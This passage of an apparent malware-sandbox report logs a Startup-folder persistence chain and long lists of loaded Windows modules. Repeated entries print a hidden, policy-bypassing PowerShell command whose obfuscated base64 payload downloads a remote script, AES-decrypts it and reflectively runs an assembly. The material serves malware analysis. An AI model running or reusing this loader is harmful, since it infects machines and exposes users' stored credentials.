l92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_4e74002f.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_6a9840ce.cmd"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiB0Ym54ZigkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnOVZ1Sk54T3dDdTh6b1JRU2pyVi9XL2xObzVaR05qUW02SEZ6MXVoazRWUT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnY2pTTW92SXB3MGpxdUZpbDh4VFEvUT09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlbXVydSgkcGFyYW1fdmFyKXsJSUVYICckdWtjYWs9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2NraXk9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkdWdzZD1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCR1a2NhaywgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkZHVnc2QuQ29weVRvKCRvY2tpeSk7CSRkdWdzZC5EaXNwb3NlKCk7CSR1a2Nhay5EaXNwb3NlKCk7CSRvY2tpeS5EaXNwb3NlKCk7CSRvY2tpeS5Ub0FycmF5KCk7fWZ1bmN0aW9uIGluZmRlKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR0ZHFzcD1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJG5heXJxPSR0ZHFzcC5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRuYXlycS5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JHNtaCA9ICRlbnY6VVNFUk5BTUU7JHZhbHhrID0gJ0M6XFVzZXJzXCcgKyAkc21oICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkdmFseGs7JG5zYnR1PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2a9205f0.cmd"
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
